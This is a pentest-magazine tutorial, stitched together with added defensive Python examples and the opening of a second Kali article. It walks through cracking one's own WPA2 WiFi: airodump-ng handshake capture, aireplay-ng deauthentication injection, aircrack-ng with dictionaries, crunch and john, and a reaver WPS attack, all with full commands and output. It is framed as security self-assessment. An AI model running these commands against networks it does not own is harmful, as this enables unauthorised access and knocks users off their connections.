without allowing a passerby to also obtain the key. Although this is beyond the scope of this article, it is helpful for the reader to understand that there is a key exchange that occurs and that it is also cryptographically protected so that the key is not available. Instead, some artifact of the key is transmitted which is a function of the secret key. If we could guess the secret key and generate the same artifact, we could be confident that we have the right key if the artifacts matched. This is the exercise that we will pursue.

Setup

This article will use Kali Linux 1.0.5-amd64:

root@kali:~# lsb_release -r
Release: Kali Linux 1.0
root@kali:~# uname -a
Linux kali 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0+kali8 x86_64 GNU/Linux

Kali Linux is installed to a virtual machine in order to allow the main PC or notebook to still have access to the network. A separate external WiFi dongle is needed. If operating in a virtual machine, the USB dongle needs to be assigned to the VM. The following WiFi dongle will be used:

root@kali:~# lsusb -v -s 001:010
Bus 001 Device 010: ID 07b8:3070 AboCom Systems Inc 802.11n/b/g Mini Wireless LAN USB2.0 Adapter

This WiFi dongle is based on the Ralink 3070 chipset (Listing 1). Lastly, we will be running all commands as root. Although this may present a security issue, several of the utilities require root access and thus it is simply easier to run as root for all the commands (Figure 1).

Figure 1. Setup

WiFi Data Capture

In order to test our WiFi network, we need to be able to first capture a key exchange between the access point and a valid user. This will give us the target to compare with as we attempt to guess the password. The first step for us will be to capture data. We need to set up our system to ensure that we have the ability to listen in on the WiFi communication that is around us. Let's begin setting up our system to capture WiFi data.

Open a terminal and become root.

root@kali:~> sudo -i

We first need to confirm we have a valid WiFi dongle (Listing 2). wlan0 is present, which is our wireless device that we will be using. Start by bringing it down to ensure our system is not going to be trying to use it out from under us.

root@kali:~# ifconfig wlan0 down

Check that it is no longer present: Listing 3.

Listing 1. Ralink 3070 chipset

[13134.967038] usb 1-1: new high-speed USB device number 10 using ehci_hcd
[13135.124983] usb 1-1: New USB device found, idVendor=07b8, idProduct=3070
[13135.124986] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[13135.124987] usb 1-1: Product: 802.11 n WLAN
[13135.124988] usb 1-1: Manufacturer: Ralink
[13135.124989] usb 1-1: SerialNumber: 1.0
[13135.303101] usb 1-1: reset high-speed USB device number 10 using ehci_hcd
[13135.551689] ieee80211 phy6: Selected rate control algorithm minstrel_ht
[13135.552002] Registered led device: rt2800usb-phy6::radio
[13135.552023] Registered led device: rt2800usb-phy6::assoc
[13135.552042] Registered led device: rt2800usb-phy6::quality



Listing 2. WiFi dongle

root@kali:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:1c:42:41:9c:da
inet addr:10.211.55.8 Bcast:10.211.55.255 Mask:255.255.255.0
inet6 addr: fdb2:2c26:f4e4:0:21c:42ff:fe41:9cda/64 Scope:Global
inet6 addr: fe80::21c:42ff:fe41:9cda/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:12406 errors:0 dropped:0 overruns:0 frame:0
TX packets:6598 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17247605 (16.4 MiB) TX bytes:424667 (414.7 KiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:188 errors:0 dropped:0 overruns:0 frame:0
TX packets:188 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:11280 (11.0 KiB) TX bytes:11280 (11.0 KiB)

wlan0 Link encap:Ethernet HWaddr 00:12:0e:9a:f3:07
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

Listing 3. Checking the WiFi dongle

root@kali:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:1c:42:41:9c:da
inet addr:10.211.55.8 Bcast:10.211.55.255 Mask:255.255.255.0
inet6 addr: fdb2:2c26:f4e4:0:21c:42ff:fe41:9cda/64 Scope:Global
inet6 addr: fe80::21c:42ff:fe41:9cda/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:12409 errors:0 dropped:0 overruns:0 frame:0
TX packets:6598 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17248418 (16.4 MiB) TX bytes:424667 (414.7 KiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:188 errors:0 dropped:0 overruns:0 frame:0
TX packets:188 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:11280 (11.0 KiB) TX bytes:11280 (11.0 KiB)



Additionally, we should kill any process that could interfere with our testing. The utility airmon-ng will help us identify processes that may be interfering with our WiFi adapter.

root@kali:~# airmon-ng check

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!

PID Name
2799 dhclient
3286 wpa_supplicant
12104 NetworkManager

In order to be safe, we will kill the above processes.

root@kali:~# kill 2799
root@kali:~# kill 3286
root@kali:~# kill 12104

The next thing we need to do is to put the wireless adapter into monitor mode.

root@kali:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb [phy6]
(monitor mode enabled on mon0)

You should see the line printed monitor mode enabled on mon0. Confirm that it is active:

root@kali:~# airmon-ng
Interface Chipset Driver
mon0 Ralink RT2870/3070 rt2800usb [phy6]
wlan0 Ralink RT2870/3070 rt2800usb [phy6]

The mon0 device shows that we have an active pseudo-device that is monitoring wlan0. From now on, we will use mon0 as our device since it is set up as a monitor-mode interface on wlan0 that allows us to monitor the WiFi traffic or inject WiFi packets through it. To begin capturing data, we will use airodump-ng. This tool will begin capturing the communication that our wireless device can see. We will start the capture on all channels and all BSSIDs.

root@kali:~# airodump-ng mon0

Let it run awhile and see what we pick up. What we are looking for is the SSID (name) of the network that we want to attack. Once we see the name of the network, we will need to record the BSSID for that network. Additionally, we should record the channel for that SSID. It is assumed that we will be dealing with one BSSID and one channel. Many systems may have multiple access points (AP) and thus will have multiple BSSIDs and possibly multiple channels. It would be recommended to attempt to attack each one in order to fully secure a system. Let's take a moment to dissect what we are seeing (Figure 2).

Figure 2. Airodump Scan Output

We are going to be working on my home network poulsen3. From the capture, we can see that the BSSID for this network is 28:C6:8E:69:A7:EE and the channel is 11. We also receive several other fields that provide valuable information. Among the fields displayed, we can also see that ENC and CIPHER are shown to be WPA2 and CCMP. This tells us that we have a WPA2 system that is secured by CCMP which will need to be cracked. As a side note, we also notice there is a linksys SSID within range that is open and unsecured. This network would be quite easy to gain access to, if it were the network of interest. Fortunately, this is not our network and it can be ignored. Now that we have a BSSID and channel for the SSID in question, let's stop the monitoring and restart it with these specific details. Press CTRL-C to stop the monitor, then restart it as follows. Remember to replace the BSSID below with your own AP's BSSID and the channel to match that which shows up in your terminal.

root@kali:~# airodump-ng mon0 --bssid 28:C6:8E:69:A7:EE --channel 11

The monitor will now stick to one channel and will focus on only one BSSID, which will allow us to narrow our attack. Since we are not yet logging data to a file, we will let this run until we are ready to capture data to begin the attack.



WiFi Packet Injection

There are times where we would like to send a packet over the air to be interpreted by another device in order to prompt some action. This is a similar concept to that of IP spoofing on a wired network. Since we are simply monitoring a network we do not have access to, we would need some way to be able to inject a packet in order to impersonate a device or impersonate the access point. This operation is referred to as packet injection. It is not necessary to learn about injection or to use this technique when we have some control over the network under attack. Our main reason for injecting a packet is to get a device to perform a key exchange so that we can capture it for cracking. If we have either a) legitimate network access from another device or b) plenty of time, then we can skip packet injection and instead simply force a WiFi authentication from the device itself or wait until a key exchange happens to occur. Regardless, we will assume that the key exchange needs to be provoked and thus will inject a fake packet to prompt it along.

While airodump-ng is still running, open another terminal and sudo -i to become root. In this terminal, we need to check if injection will work on the WiFi dongle and AP that we are monitoring. We will use aireplay-ng to perform the injection. This utility has several ways to inject packets to prompt a key exchange. These are selected by the arguments -0 through -9 which are simply shorthands for the various sub-tools within this utility. The -9 option allows us to test the injection: Listing 4.

We expect to see Injection is working!, which is displayed. Therefore, we can continue. If we do not see this result, we may repeat the command a few more times or we may need to try a different WiFi dongle. It is also important to note that we may need to be closer to the AP in order for the packets to be received. Now that we have gotten injection to work, let's next test a real injection. As stated earlier, there are several injection methods that can be used. We will try the first method (-0), which is described by the help page as "deauthenticate 1 or all stations". This method will send a fake packet from the AP to the device, asking it to de-authenticate and thus prompting it to re-authenticate. It is this re-authentication that we wish to capture and use in our password attack. Before we continue, it is important to understand the top-line output of airodump-ng, which should still be running and collecting data. Look at the following sample top-line:

CH 11 ][ Elapsed: 18 mins ][ 2013-09-29 15:54 ][ WPA handshake: 28:C6:8E:69:A7:EE

Notice that the last section indicates we have a valid WPA handshake for our BSSID. This is what we are looking for and once we have this, we can begin cracking. This section will be displayed only after a WPA handshake is observed. However, since we have not logged any data, in the end we have nothing to aid us in our cracking.

For this exercise, if you see this WPA handshake entry in your monitor, simply press CTRL-C to stop the monitor, then restart it. We want to go through the exercise of forcing a handshake to see it as it occurs. Let's try a broadcast de-authentication injection:

root@kali:~# aireplay-ng mon0 -a 28:C6:8E:69:A7:EE -0 1
15:56:45 Waiting for beacon frame (BSSID: 28:C6:8E:69:A7:EE) on channel 11
NB: this attack is more effective when targeting a connected wireless client (-c <clients mac>).
15:56:46 Sending DeAuth to broadcast -- BSSID: [28:C6:8E:69:A7:EE]

If all goes well, your monitor will suddenly show the WPA handshake line. Additionally, you may

Listing 4. Aireplay-ng injection checking

root@kali:~# aireplay-ng mon0 -a 28:C6:8E:69:A7:EE -9
15:39:21 Waiting for beacon frame (BSSID: 28:C6:8E:69:A7:EE) on channel 11
15:39:21 Trying broadcast probe requests...
15:39:21 Injection is working!
15:39:23 Found 1 AP
15:39:23 Trying directed probe requests...
15:39:23 28:C6:8E:69:A7:EE - channel: 11 - poulsen3
15:39:24 Ping (min/avg/max): 1.569ms/24.885ms/41.820ms Power: -56.90
15:39:24 29/30: 96%
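The de-authentication frames that aireplay-ng -0 sends are exactly what a wireless IDS on the defender's side watches for. As an added example, not from the article or the aircrack-ng project, this Python classifier decodes the 802.11 management-frame header and flags a burst of deauth/disassoc frames per BSSID; the frames, timestamps, window and threshold are constructed samples and assumptions that reuse the article's AP and station addresses.

```python
"""Detect de-authentication bursts in captured 802.11 management frames."""
from collections import defaultdict, deque

TYPE_MGMT = 0
SUBTYPE_BEACON = 8
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12
BROADCAST = "FF:FF:FF:FF:FF:FF"


def fmt_mac(raw: bytes) -> str:
    return ":".join(f"{b:02X}" for b in raw)


def parse_mgmt_header(frame: bytes) -> dict:
    """Decode the fixed 24-byte MAC header. Frame Control byte 0 packs
    version (bits 0-1), type (bits 2-3) and subtype (bits 4-7)."""
    if len(frame) < 24:
        raise ValueError("truncated 802.11 header")
    fc = frame[0]
    if fc & 0x03 != 0:
        raise ValueError("unknown 802.11 protocol version")
    return {
        "type": (fc >> 2) & 0x03,
        "subtype": (fc >> 4) & 0x0F,
        "addr1": fmt_mac(frame[4:10]),    # receiver (the station being kicked)
        "addr2": fmt_mac(frame[10:16]),   # transmitter (claims to be the AP)
        "addr3": fmt_mac(frame[16:22]),   # BSSID
    }


def deauth_reason(frame: bytes) -> int:
    """Reason code: the first two body bytes, little-endian."""
    return int.from_bytes(frame[24:26], "little")


def find_deauth_bursts(events, window_s: float = 2.0, threshold: int = 10):
    """events: iterable of (timestamp_seconds, frame_bytes) in capture order.
    Alert once per BSSID each time `threshold` deauth/disassoc frames land
    inside a sliding window of `window_s` seconds (both values are assumptions)."""
    recent = defaultdict(deque)   # bssid -> timestamps still inside the window
    alerts = []
    for ts, frame in events:
        hdr = parse_mgmt_header(frame)
        if hdr["type"] != TYPE_MGMT or hdr["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        q = recent[hdr["addr3"]]
        q.append(ts)
        while q and ts - q[0] > window_s:
            q.popleft()
        if len(q) == threshold:   # fires once, as the burst crosses the line
            alerts.append({"bssid": hdr["addr3"], "target": hdr["addr1"],
                           "broadcast": hdr["addr1"] == BROADCAST,
                           "count": len(q), "at": ts, "reason": deauth_reason(frame)})
    return alerts


# Constructed sample frames (not taken from the article's capture), using the
# article's AP 28:C6:8E:69:A7:EE and the station 28:CF:E9:15:FD:C7.
SAMPLE_BEACON = bytes.fromhex(
    "8000 0000 ffffffffffff 28c68e69a7ee 28c68e69a7ee 0000"   # header
    "0000000000000000 6400 1104")                             # timestamp, interval, capability
SAMPLE_DEAUTH = bytes.fromhex(
    "c000 3a01 28cfe915fdc7 28c68e69a7ee 28c68e69a7ee 0000"   # header
    "0700")                                                   # reason code 7

SAMPLE_EVENTS = [(0.0, SAMPLE_BEACON)]
# 64 directed deauths within a third of a second, like "Sending 64 directed DeAuth"
SAMPLE_EVENTS += [(1.0 + i * 0.005, SAMPLE_DEAUTH) for i in range(64)]
# a single genuine disconnect much later must not raise an alert
SAMPLE_EVENTS.append((60.0, SAMPLE_DEAUTH))


def sample_alerts():
    return find_deauth_bursts(SAMPLE_EVENTS)


if __name__ == "__main__":
    for a in sample_alerts():
        kind = "broadcast" if a["broadcast"] else "directed"
        print(f"{a['at']:.3f}s deauth burst from {a['bssid']} ({kind} -> {a['target']}), "
              f"{a['count']} frames in window, reason {a['reason']}")
```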



have a few entries that allow you to learn about which devices are connected.

BSSID             STATION           PWR  Rate    Lost  Frames  Probe
28:C6:8E:69:A7:EE 00:15:E9:F9:76:9B -76  1 -36   0     9
28:C6:8E:69:A7:EE 28:CF:E9:15:FD:C7 -16  1e- 1e  0     7

One thing to note is if the broadcast de-authentication does not work, you should try it again with the -c option to single out specific devices to de-authenticate.

root@kali:~# aireplay-ng mon0 -a 28:C6:8E:69:A7:EE -0 1 -c 28:CF:E9:15:FD:C7
15:59:15 Waiting for beacon frame (BSSID: 28:C6:8E:69:A7:EE) on channel 11
15:59:16 Sending 64 directed DeAuth. STMAC: [28:CF:E9:15:FD:C7] [26|61 ACKs]

Of course, if you are attacking your own network, you simply need to use the MAC address of a known laptop on your network without having to wait and learn which devices are using the WiFi network.

In short, we need to capture a WPA handshake. We can obtain this handshake by simply waiting until it naturally occurs or we can provoke a device into performing this handshake by injecting fake packets that ask it to de-authenticate and thus re-authenticate. Once we are able to provoke a WPA handshake, we are ready to repeat these tests with logging enabled, so that we can capture this data for off-line processing.

Additionally, there are other methods of injection, of which some are a bit trickier and some are only supported for WEP mode. If mode -0 fails, you may want to try one of the other methods or simply wait until a device legitimately connects to the WiFi network.

Putting it All Together

Now that we are able to capture a key exchange, we will repeat this process while logging the captured data. We purposely did not log to a file so that we could investigate what works and obtain some ESSIDs that might be susceptible to de-authentication requests. This allows us to avoid accumulating large amounts of data until we are truly ready to begin. Everything up to this point was mostly exploratory and now we begin the real work. Let's first stop the airodump (CTRL-C) and restart it with logging enabled.

root@kali:~# airodump-ng mon0 --bssid 28:C6:8E:69:A7:EE --channel 11 -w myfiles

Figure 3. Targeted Airodump Scan Output

The -w option tells it to dump the captured data to a capture file. This file will be used in our password cracking attempts. Now that it is running, attempt the injection again:

root@kali:~# aireplay-ng mon0 -a 28:C6:8E:69:A7:EE -0 1

You may want to replace the injection command above with the one that worked on your system. Next we wait for airodump-ng to report a WPA handshake, then press CTRL-C.

Now we should see our capture files:

root@kali:~# ls myfiles*
myfiles-01.cap myfiles-01.csv myfiles-01.kismet.csv myfiles-01.kismet.netxml

The three files myfiles-01.csv, myfiles-01.kismet.csv, and myfiles-01.kismet.netxml are simply variations of the data we see when running it live. It is myfiles-01.cap where the full data lies.

Now that we have a capture file that contains a WPA handshake, we are done with the WiFi network. The remaining testing will be concerned with uncovering the password of our network by using only the captured file. The password cracking may take quite a bit of time, but it can be done offline and in the background. It is important to remember that intruders often have much time and computing power. In order to protect against this, we need to be willing to give some time to our crackers in order to verify that we are secure.

Password Cracking

Inside the myfiles-01.cap file, we have the data which contains a WPA handshake or key exchange. Within this handshake we have, in essence, an encrypted version of our WiFi password. It is this password that we seek and now we need to work on this file until we can extract the password. Since we have an encrypted password, the only reasonable method we can use to obtain it is



by repeated attempts at guessing passwords. With this method, we will guess passwords, encrypt and/or hash them, then compare the encrypted/hashed version to that which we captured. When they match, we know we have the right password. In order to guess many passwords, we will use aircrack-ng along with a dictionary. The dictionary will be used as the source of passwords to guess. Let's start by finding a suitable dictionary. Our choice of dictionary may very well determine if we are successful or not, so it is important to pick a fairly large one. Dictionaries can be obtained on the Internet from sites such as http://www.outpost9.com/files/WordLists.html. We will use the dic-0294.zip dictionary from this page. Be sure to unzip the dictionary to obtain the file dic-0294.txt. Once you have a valid dictionary, it is time to begin the cracking.

root@kali:~# aircrack-ng -a 2 myfiles-01.cap -b 28:C6:8E:69:A7:EE -w dic-0294.txt

This command will force WPA2 cracking on our BSSID using the dictionary file we downloaded. Our hope is that the network is secured using dictionary words. Once we run this command, we must wait for possibly a long time. If we are lucky, the password may be found quickly, as was mine (Figure 4).

Figure 4. Aircrack Password Found

This may not always produce a found password, especially if the password is much more complicated. One thing to keep in mind is that, with the purpose of securing the system, you must attack your own system harder than a possible intruder would, in order to ensure it is tightly secured. What happens if this method fails to find our password? We then must try other methods with the intention of truly trying to crack it. Only if all of our attempts are thwarted can we have some surety that our system will withstand an intruder's attack. Perhaps a larger dictionary, or a brute-force method, would be in order.

Brute-Force

Changing our WiFi password to aaaaazaa will make it significantly easier to brute-force crack the password. In order to use this method, we will not use the dictionary, but will instead use the output of a utility called crunch. This utility will sequence through all combinations, which will make it painfully slow. It requires two arguments which are the minimum and maximum password lengths. We also have the option to specify valid password characters if we choose to do so. This might come in handy if we want to brute-force through all the numerical digits only. For now, we will use the defaults.

root@kali:~# crunch 8 8 | aircrack-ng -a 2 myfiles-02.cap -b 28:C6:8E:69:A7:EE -w -

This will attempt to guess all eight-character alphabetic passwords on a new capture. This new capture (myfiles-02.cap) was created per the previous instructions, after the WiFi password was changed. It may be desirable to estimate how long it will take to complete the password guessing by using crunch's output along with aircrack-ng's output.

root@kali:~# crunch 8 8 > /dev/null

Crunch will now generate the following amount of data: 1879443581184 bytes.
1792377 MB
1750 GB
1 TB
0 PB
Crunch will now generate the following number of lines: 208827064576

This tells us we have 208827064576 passwords to guess and aircrack-ng tells us it can test 1150 keys per second. After some calculation, we find that we can test all the possible passwords of eight alpha letters in just over 5 years! Now you can see why I chose my password to start with aaaaaz. This ensures that it is more quickly found. Finding the password took only ten minutes, but that is only because we were near the beginning of the search (aaaas). Of course, for most passwords, we can't expect it to be near the beginning and even worse, if our password is just one character longer, that is nine characters long, then we might expect 149 years to crack it. Furthermore, if we add numbers and symbols into the mix, then we further increase the testing time. This clearly shows why random passwords are much more secure than dictionary based passwords. It should also be noted that the cracking of the passwords can be sped up by using a higher performance Linux PC versus a virtual machine, or even multiple PCs that are working on the same file but using different ranges of the brute-force set.

Modified Brute-Force

Since a brute force likely takes too long to achieve in our lifetimes and a dictionary attack does not cover some common passwords, we may want to use a modified approach. We can get smarter about guessing passwords by guessing things like poulsen1 or myw1f1. In order to do this kind of approach, we could write our own script or we could use the utility john. This utility is designed to crack password files, but using the -stdout option, we can simply generate a password list output.

root@kali:~# john -w:dic-0294.txt -stdout -rules

It is not necessary to keep cracking our WiFi network at this time as we can simply use john to see if our password is solid. Let's start with deadbeef again and check it with john (Figure 5).

root@kali:~# john -w:dic-0294.txt -stdout -rules | grep deadbeef

Figure 5. John Password Generation

As we can see, deadbeef is guessed along with many other variations. Ideally we might want to find a password that john won't even guess, but there is also the matter of how long it will take to guess it. Even if john can guess the password, how long will it take? Is it long enough for us to consider our system secure? Furthermore, we can modify john's rules to create more elaborate alterations of passwords or even create a python script that does exactly what we want. In short, if we don't know the password, we simply use john or a custom tool to create a password list that is piped into aircrack-ng:

root@kali:~# john -w:dic-0294.txt -stdout -rules | aircrack-ng -a 2 myfiles-01.cap -b 28:C6:8E:69:A7:EE -w -

Once again, the original deadbeef password is quickly cracked.

Reaver

A WiFi attack discussion is not complete without talking about reaver. Reaver is a utility that takes advantage of WPS to almost certainly discover the password of our network. In order to prevent reaver from cracking your system, we must disable WPS in your router, if it is possible. Let's examine a reaver attempt to crack a WiFi network via WPS exploitation.

Before we run reaver, we should check if our router has WPS active: Listing 5.

We let this run until we see our AP which we want to test, then CTRL-C to abort. If our AP shows a WPS Version and WPS Locked is No, then we should be able to use reaver to obtain our password. One way to start reaver is to first perform a fake authentication using aireplay-ng:

root@kali:~# aireplay-ng mon0 -1 120 -a 28:C6:8E:69:A7:EE -e poulsen3

Once this has shown that we are authenticated, we leave it running and in another terminal, start reaver.

root@kali:~# sudo reaver -i mon0 -A -b 28:C6:8E:69:A7:EE -vv

We may need to experiment with the -S, -N, and/or -L options to get it to work. We experiment until we find some settings of reaver that show progression of the pin attempts. Next, we would let it run for several hours and we are almost guaranteed to obtain the password. Reaver will continue until the password is found.

Locking the System Down

We have thus far gone through the exercise of testing WiFi susceptibility to various attacks with the purpose of assessing our WiFi network. At the end of these exercises we must come up with some measures that allow us to prevent these attacks from outsiders. Although we cannot completely lock down any system that selectively allows outside access, our goal should be to stay

EXTRA 05/2013(16) Page 23 http://pentestmag.com


ahead of the intruders. One of the first things we must conclude is that WPS needs to go. We should not have WPS active in our system. It is a major security hole that provides little to no benefit. Disabling WPS will greatly increase the security of our system. If our router does not support the disabling of WPS, then the router needs to go. It is NOT enough to disable WPS without following it up by testing vulnerability with reaver. We should not rely on our router's settings to tell us what it is doing. We should instead test it ourselves. Several routers claim to disable WPS, but still remain vulnerable to a WPS attack.

The next thing we must do to lock down the system is to choose a strong password. Here are some guidelines in choosing the password:

- Lean more towards 64 characters in length versus 8 characters in length.
- Lean more towards random passwords versus dictionary based passwords.
- Mix lower and upper case along with numbers.
- Change your passwords regularly.

You could choose an easy to remember password that is strong, such as sheepdog93blackcoat42travel or welcometoCOMPANYpleaseenjoyourprivatewifi.

Once we have set the password, we need to retest our security using the above procedures. When we have a good process to test our system, we could set it up as a script and run it as a cron job periodically which emails us the results. We can make sure to run aircrack-ng under nice/ionice so that it doesn't bog our system down, if that matters. A system that runs like this periodically will constantly monitor our wifi security in the background and can be a front-line defense that catches many holes in our system that are caused by negligence, such as someone changing the password to something that is insecure.

Summary
It is imperative that we take the lead in testing our own systems in order to prevent unauthorized access. In being aware of the vulnerabilities, we can make conscious decisions as to what we want to allow our WiFi users to have access to. We can either lock it down tight with respect to content access, or take the time to ensure the system is of high security. Continual testing with the latest tools is essential, and a distribution such as Kali Linux aids in keeping us armed with the most recent developments. As IT professionals, it is important that we do not use technologies that we do not understand as well as the potential attackers. This article was designed to help us assess our WiFi networks, but also to help us gain understanding as to how WiFi systems are typically attacked, allowing us to be aware of this technology, along with its vulnerabilities.

Steve Poulsen
Steve Poulsen is the Director of Technology for Communication Systems Solutions, LLC (CSS). Steve's background is in digital signal processing, digital audio and video processing, and embedded Linux design and development. He currently manages the embedded software development team for CSS, which also includes IT responsibilities.

Listing 5. Checking router WPS status

root@kali:~# wash -i mon0 -C -s


Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID


----------------------------------------------------------------------------------------------------
3C:81:D8:2A:AD:58 1 -79 1.0 No WIN _ ad59
30:46:9A:1C:63:08 2 -83 1.0 No NETGEAR
C8:D7:19:46:EF:02 4 -85 1.0 No Linksys75366
60:A4:4C:27:9D:28 6 -73 1.0 No (null)
00:1E:E5:82:64:9C 6 -89 1.0 No linksys
20:AA:4B:2A:8F:87 6 -91 1.0 No ShinyCedar
10:0D:7F:78:5B:65 8 -91 1.0 No NETGEAR68
28:C6:8E:69:A7:EE 11 -55 1.0 Yes poulsen3
44:94:FC:5B:31:BE 11 -87 1.0 No NETGEAR34
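The periodic self-test suggested above can automate two of the checks from "Locking the System Down": whether our own access point still shows up in wash output after we believe WPS is disabled, and whether a candidate passphrase meets the four guidelines. The following is an added example written for this page, not the author's code: it parses the Listing 5 table (copied in as a constructed string) and scores a passphrase. The 20-character minimum and the tiny word list are assumptions made for the example; the article gives guidelines, not exact numbers.

```python
"""WiFi self-audit helpers (added example, not the article's code).

Covers two of the "Locking the System Down" points:
  * parse wash output (Listing 5) and tell whether our own access point
    still advertises WPS after we believe we disabled it;
  * score a candidate WPA passphrase against the four guidelines.
MIN_LENGTH and COMMON_WORDS are assumptions made for this example.
"""
import re
import string

# Constructed input: rows copied from the Listing 5 wash output above.
WASH_OUTPUT = """\
Wash v1.4 WiFi Protected Setup Scan Tool
BSSID                  Channel  RSSI  WPS Version  WPS Locked  ESSID
---------------------------------------------------------------------
3C:81:D8:2A:AD:58      1        -79   1.0          No          WIN _ ad59
60:A4:4C:27:9D:28      6        -73   1.0          No          (null)
28:C6:8E:69:A7:EE      11       -55   1.0          Yes         poulsen3
44:94:FC:5B:31:BE      11       -87   1.0          No          NETGEAR34
"""

# BSSID, channel, RSSI, WPS version, locked flag, then the ESSID (may contain spaces).
WASH_ROW = re.compile(
    r"^([0-9A-Fa-f:]{17})\s+(\d+)\s+(-?\d+)\s+(\S+)\s+(Yes|No)\s+(.*?)\s*$")


def parse_wash(text):
    """One dict per access point in wash's table.

    wash only lists APs that answer with a WPS information element, so
    every row is an AP that advertises WPS, locked or not.
    """
    aps = []
    for line in text.splitlines():
        m = WASH_ROW.match(line)
        if not m:
            continue  # banner, header and separator lines
        bssid, chan, rssi, version, locked, essid = m.groups()
        aps.append({"bssid": bssid.upper(), "channel": int(chan),
                    "rssi": int(rssi), "wps_version": version,
                    "locked": locked == "Yes", "essid": essid})
    return aps


def wps_status(text, own_bssid):
    """'absent' (WPS no longer advertised: the goal), 'locked', or 'open'."""
    for ap in parse_wash(text):
        if ap["bssid"] == own_bssid.upper():
            return "locked" if ap["locked"] else "open"
    return "absent"


MIN_LENGTH = 20  # assumption: the article says lean towards 64 rather than 8
COMMON_WORDS = {"password", "deadbeef", "welcome", "linksys", "netgear",
                "sheepdog"}  # constructed stand-in for a real dictionary file


def _core_word(pw):
    """Undo the trivial mangling wordlist rules apply (leading/trailing
    digits or symbols, case changes) to see what dictionary word remains."""
    return pw.strip(string.digits + string.punctuation).lower()


def passphrase_report(pw, wordlist=COMMON_WORDS):
    """Map each guideline to True (met) or False (not met)."""
    return {
        "length_ok": len(pw) >= MIN_LENGTH,
        "mixed_case": any(c.islower() for c in pw) and any(c.isupper() for c in pw),
        "has_digit": any(c.isdigit() for c in pw),
        "not_dictionary": _core_word(pw) not in wordlist,
    }


def is_acceptable(pw, wordlist=COMMON_WORDS):
    """True only when every guideline is met."""
    return all(passphrase_report(pw, wordlist).values())


if __name__ == "__main__":
    print("poulsen3 WPS:", wps_status(WASH_OUTPUT, "28:C6:8E:69:A7:EE"))
    for candidate in ("deadbeef", "DeadBeef42!", "sheepdog93blackcoat42travel"):
        print(candidate, passphrase_report(candidate))
```

Feeding the real `wash -i mon0 -C -s` output to `wps_status` with the router's BSSID gives the check the article asks for: the desired answer is "absent", and a "locked" answer only means the router is rate-limiting, which is exactly the case where the text says to retest rather than trust the settings page.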



SCENARIOS

Web Applications with Kali Linux

In March 2013, a new penetration testing distribution with 300 Debian compliant packages and written in eight (8) different languages was born. It is named Kali Linux. Kali Linux is the right place for learning hacking and performing penetration testing when it comes to security testing tools. Let's rephrase the metaphor of Patrick Engebretson about BackTrack by saying that Kali Linux reminds cyber security professionals of that scene in the Matrix movie where Tank asks Neo "What do you need other than a miracle?" Neo replied by saying "Guns. Lots of Guns."

In the same way and same line of thought, penetration testers and hackers have that inkling or feeling when they first fire up Kali Linux. Security Tools. Lots of Security Tools. The entire distribution is built from the ground up for penetration testers and hackers. It comes preloaded with numerous security tools that are installed, configured, and ready to be used. Kali Linux is the new generation of the industry-leading BackTrack Linux penetration testing and security auditing Linux distribution. Many penetration testers and serious hackers use Linux-based open source penetration test tools from which to launch their attacks. Kali Linux contains a number of tools that can be used by security professionals during a security assessment process and vulnerability assessment. In this article, we will begin with a brief overview of Kali's features, then focus on how to perform web application testing using the tools installed in Kali Linux. The security tools fall into the categories listed in Table 1.

Table 1. Security tools categories

Information gathering: This category contains several tools that can be used to get information regarding a target, such as DNS, routing and many more.
Vulnerability Analysis: In this category you can find tools to scan for multiple vulnerabilities.
Web Applications: This category contains tools that can be used in auditing web applications.
Password Attacks: This category holds tools that can be utilized to crack simple and complex passwords.
Wireless Attacks: This section maintains tools for checking wireless networks, Bluetooth and radio.
Exploitation Tools: Tools in this category help exploit vulnerabilities and gain access to the target machine; you can also use tools in this category to escalate your privileges to the highest level.
Sniffing/Spoofing: This section contains tools that capture network packets.
Maintaining Access: Tools in this category help you maintain access to the target.
Reverse Engineering: This category contains tools that can be used to debug a program or disassemble an executable file.
Stress Testing: Tools in this category are used for flooding a network and testing for denial of service.
Hardware Hacking: This section holds tools that are useful for mobile devices such as Android.
Forensics: In this category you can find several tools that can be used to do digital forensics, such as acquiring a hard disk image, carving files, and analyzing a hard disk image.

Figure 1 illustrates the different categories of the tool set in Kali Linux.

Figure 1. Kali Linux Tools Category

